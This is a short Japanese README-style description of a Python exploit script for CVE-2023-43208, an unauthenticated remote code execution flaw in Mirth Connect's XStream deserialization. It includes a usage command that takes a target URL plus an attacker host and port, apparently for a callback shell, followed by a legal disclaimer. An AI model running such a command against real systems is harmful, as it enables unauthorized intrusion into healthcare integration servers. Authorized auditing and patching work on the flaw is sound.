
PythonによるCVE-2023-43208 Mirth Connect RCE(未認証XStream)の実装
このエクスプロイトは、Mirth Connect の XStream エンジン内の深刻なデシリアライゼーションの脆弱性を悪用します。これは CVE-2023-37679 に対する不完全なパッチに起因し、4.4.1 より前のすべてのバージョンで未認証の任意コード実行を可能にします。
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
このエクスプロイトスクリプトは、CVE-2023-43208 の緩和を支援する防御者向けの教育目的および認可されたセキュリティ監査専用に意図されています。許可されていないターゲットに対するこのツールの使用は違法であり、その責任はすべてエンドユーザーに帰属します。作者は本ソフトウェアを「現状のまま」いかなる保証もなく提供し、潜在的な誤用や損害に対するすべての責任を否認し、許可されていない活動を容認または推奨するものではありません。自己責任で使用し、適用される法律にのみ準拠して使用してください。